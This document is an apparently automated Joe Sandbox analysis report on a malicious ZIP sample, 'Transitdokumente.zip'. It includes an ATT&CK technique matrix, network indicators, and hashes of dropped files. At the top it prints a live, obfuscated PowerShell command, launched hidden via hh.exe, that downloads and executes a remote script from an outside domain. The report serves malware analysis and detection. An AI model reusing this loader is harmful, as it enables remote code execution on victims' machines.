Source: C:\Windows\hh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://stradlingcollection.org/tymoon.txt')|P
Source: C:\Windows\hh.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Windows\hh.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\hh.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Windows\hh.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\hh.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\hh.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0212~31bf3856ad364e35~amd64~~10.0.18362.387.cat VolumeInformation
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts11
Command and Scripting Interpreter
1
LSASS Driver
11
Process Injection
1
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network Medium2
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts1
Exploitation for Client Execution
1
DLL Side-Loading
1
LSASS Driver
31
Virtualization/Sandbox Evasion
LSASS Memory31
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Non-Application Layer Protocol
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts1
PowerShell
Logon Script (Windows)1
DLL Side-Loading
11
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Deobfuscate/Decode Files or Information
NTDS1
Remote System Discovery
Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
File and Directory Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials12
System Information Discovery
VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
stradlingcollection.org0%VirustotalBrowse
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
stradlingcollection.org
62.182.20.50
truetrueunknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
62.182.20.50
stradlingcollection.orgUnited Kingdom
200083SUB6GBtrue
Joe Sandbox Version:36.0.0 Rainbow Opal
Analysis ID:707677
Start date and time:2022-09-22 11:03:17 +02:00
Joe Sandbox Product:CloudBasic
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Transitdokumente.zip
Cookbook file name:defaultwindowsinteractivecookbook.jbs
Analysis system description:Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
Number of analysed new started processes analysed:16
Number of new started drivers analysed:3
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • EGA enabled
Analysis Mode:stream
Analysis stop reason:Timeout
Detection:MAL
Classification:mal52.expl.winZIP@4/6@1/9
Cookbook Comments:
  • Found application associated with file extension: .zip
  • Exclude process from analysis (whitelisted): vhdmp.sys, dllhost.exe, rundll32.exe, fsdepends.sys, svchost.exe
  • Excluded IPs from analysis (whitelisted): 40.126.32.133, 20.190.160.22, 20.190.160.20, 40.126.32.138, 40.126.32.72, 40.126.32.76, 40.126.32.140, 40.126.32.134
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, prda.aadg.msidentity.com, login.live.com, www.tm.lg.prod.aadmsa.akadns.net, ctldl.windowsupdate.com, www.tm.a.prd.aadg.akadns.net, login.msa.msidentity.com
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):1.1628158735648508
Encrypted:false
SSDEEP:
MD5:E986DDCA20E18C878305AA21342325F6
SHA1:AE6890EE7BB81A051A4F4079F549DEBCCE0F82C9
SHA-256:9624DAA47DF80C2229877179550D8373CAEEEAE25A8123698D7A516AD455DD15
SHA-512:8B0CD5C1F0BAECA299669D6A0CB74F9315E90B05EDEA16C92B92D9927D3D07225AC5DAE9941CF339E1CED349BA8129F56F118CF89AB86CF8DAAAFFDB8EC8B56D
Malicious:false
Reputation:low
Preview:@...e................................................@..........
Process:C:\Windows\hh.exe
File Type:data
Category:dropped
Size (bytes):8276
Entropy (8bit):0.6274991512679713
Encrypted:false
SSDEEP:
MD5:943D3CE711A5EBA4A01A9B4E8EDF1388
SHA1:E8DFD5502B1413F4996CA43E2E76E45F2A32A1D7
SHA-256:BBB45CCB31607F92D62EE94204B0E2E4CA802EA6AE6A7B8B6AEBFE99655FA920
SHA-512:C969D0EF61FFAC73436EC7F094F9C737AD0F26D05EAA8AA506A919F31ACF22E237CBB088F7291C1883C8BF3ABE764F9895F921B4B37EE87A0353F8E4229E68E3
Malicious:false
Reputation:low
Preview:ITSP....T........ ..................................j..].!......."..T...............PMGL?................/....::DataSpace/NameList..4<(::DataSpace/Storage/MSCompressed/Content...,::DataSpace/Storage/MSCompressed/ControlData....)::DataSpace/Storage/MSCompressed/SpanInfo..../::DataSpace/Storage/MSCompressed/Transform/List..p&_::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/...i::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ResetTable......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:low
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\hh.exe
File Type:MS Windows HtmlHelp Data
Category:dropped
Size (bytes):8590
Entropy (8bit):0.7910104748325664
Encrypted:false
SSDEEP:
MD5:1F5E082E352F575731B5C76CA056654D
SHA1:B5CB674BEEADBAF7640E30057261DAF90B39B496
SHA-256:04CD68353952698AA40BCD789BD2E8C2FE2D3C27631087CF8255327613032850
SHA-512:60EF485002FD2C79F2BFCB4193321C4BDB60D4E8CB4C87B526B0C67366D6319C43F891205511A450A74D262008087F9EEF1A9B5A7A9F1CDFB5F19EFBC8518BF6
Malicious:false
Reputation:low
Preview:ITSF....`..........@.......|.{.......".....|.{......."..`.......(.......:.......T .......................!......................,...................j..].!......."..T.....................U.n.c.o.m.p.r.e.s.s.e.d.....M.S.C.o.m.p.r.e.s.s.e.d...{.7.F.C.2.8.9.4.0.-.9.D.3.1.-.1.1.D.0.............LZXC....................ITSP....T........ ..................................j..].!......."..T...............PMGL?................/....::DataSpace/NameList..4<(::DataSpace/Storage/MSCompressed/Content...,::DataSpace/Storage/MSCompressed/ControlData....)::DataSpace/Storage/MSCompressed/SpanInfo..../::DataSpace/Storage/MSCompressed/Transform/List..p&_::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/...i::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ResetTable............................................................................................................................................................
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):6223
Entropy (8bit):3.7312046419929006
Encrypted:false
SSDEEP:
MD5:CE1722646D1A5111F49FBDC1E403453A
SHA1:B78465CC4E946CD76A90F971444A34CB98E975F1
SHA-256:F06B1858D543DFACE92F8ABA1665A4F4F203C2F3DE978D95D76612DD58C60E46
SHA-512:07D5ACC1EC8E9894429FA7BA8221B6CA8C80985D334098C7473923DAC78442C92C25B2632C5BB1EEFE7B4008A24B2965C49E3890D9E4AE2AFCFC811CF0B17552
Malicious:false
Reputation:low
Preview:...................................FL..................F.".. ...#..]x\..\.5Cb....5]&..............................:..DG..Yr?.D..U..k0.&...&.......4.]x\..C..v.....jCb.......t...CFSF..1......RDy..AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......RDy6UnH..........................w.i.A.p.p.D.a.t.a...B.V.1......R.y..Roaming.@.......RDy6UnH..............................R.o.a.m.i.n.g.....\.1.....6U.H..MICROS~1..D.......RDy6U.H..............................M.i.c.r.o.s.o.f.t.....V.1......U.m..Windows.@.......RDy6UnH...........................TS.W.i.n.d.o.w.s.......1......RFy..STARTM~1..n.......RDy6UnH....................D.....l<..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......RFy..Programs..j.......RDy6UnH....................@.....:...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1.....sN.&..WINDOW~1..V.......RDy.Uqk..........................}...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2.....sN2& .WINDOW~3.LNK..^.......RDy6U.H................
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):6223
Entropy (8bit):3.7312046419929006
Encrypted:false
SSDEEP:
MD5:CE1722646D1A5111F49FBDC1E403453A
SHA1:B78465CC4E946CD76A90F971444A34CB98E975F1
SHA-256:F06B1858D543DFACE92F8ABA1665A4F4F203C2F3DE978D95D76612DD58C60E46
SHA-512:07D5ACC1EC8E9894429FA7BA8221B6CA8C80985D334098C7473923DAC78442C92C25B2632C5BB1EEFE7B4008A24B2965C49E3890D9E4AE2AFCFC811CF0B17552
Malicious:false
Reputation:low
Preview:...................................FL..................F.".. ...#..]x\..\.5Cb....5]&..............................:..DG..Yr?.D..U..k0.&...&.......4.]x\..C..v.....jCb.......t...CFSF..1......RDy..AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......RDy6UnH..........................w.i.A.p.p.D.a.t.a...B.V.1......R.y..Roaming.@.......RDy6UnH..............................R.o.a.m.i.n.g.....\.1.....6U.H..MICROS~1..D.......RDy6U.H..............................M.i.c.r.o.s.o.f.t.....V.1......U.m..Windows.@.......RDy6UnH...........................TS.W.i.n.d.o.w.s.......1......RFy..STARTM~1..n.......RDy6UnH....................D.....l<..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......RFy..Programs..j.......RDy6UnH....................@.....:...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1.....sN.&..WINDOW~1..V.......RDy.Uqk..........................}...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2.....sN2& .WINDOW~3.LNK..^.......RDy6U.H................
File type:Zip archive data, at least v2.0 to extract
Entropy (8bit):7.983106851844272
TrID:
  • ZIP compressed archive (8000/1) 100.00%
File name:Transitdokumente.zip
File size:14859
MD5:23272bbcd8f183e8c03873fb0f9c6e56
SHA1:c52f6ba4fe98bf99927d3595071f95348ae9a485
SHA256:c220a262fc0c5c7835debdf7c17303020af2db45487663ffdd6d6e52e729e32a
SHA512:a9c233c70f1e4ca75d70242013c8968639f88131b6e97927bf465f84b06e4c4fae8c2c2d865f9d18279b2b18544e1960603fc92d00ecbf3316028bb39ff632f5
SSDEEP:384:22V7WR3cH8QdXnY5yKV0Oho4DLqJJNi+wxhauK3ea:2yKR3cH8qnY5TyO2JYdhW
TLSH:1C62D0FB4E11F288E3480AB89309992C515B7D0E58FFF48B193B689700E9A8067D6D89
File Content Preview:PK.........:3U.>..........(...Transitdokumente/attachments/F.Lillo.png..j.c.D.:1....4..K..+/.?e..b+..n%L..WS...........?j....&....-...P....l.?!....x........$D..:i.w&.[s..u...]....2...pZ..z{...)...k..N"e..a....T......2.S1...Q.e..>.....{y....2...:d....c ]..
Icon Hash:f4ccccccccccccdc